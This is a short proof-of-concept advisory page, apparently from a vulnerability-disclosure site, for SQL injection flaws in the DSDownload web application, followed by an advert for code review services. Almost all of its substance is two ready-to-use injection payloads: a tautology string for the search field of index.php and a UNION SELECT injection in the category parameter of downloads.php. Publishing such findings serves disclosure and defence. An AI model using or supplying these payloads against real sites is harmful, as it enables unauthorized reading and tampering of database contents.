PoC/Exploit for Multiple SQL Injection in DSDownload

Published Proof of Concept code - Multiple SQL Injection in DSDownload.

Description
Available
Solution
Not available - check vendor's website

SQL Injection Examples:

1) Example1

URL: http://[host]/dsdownload/index.php
Search: asd%'or(1)/*


2) Example2

http://[host]/dsdownload/downloads.php?category=999'%20union%20select%206,2,3,4,5,1,7,8/*

Order Source Code Review

Protect against hacker attacks by source code review of your site or web application made by our team.The work will be done by experts in website security.

Advisories by vuln type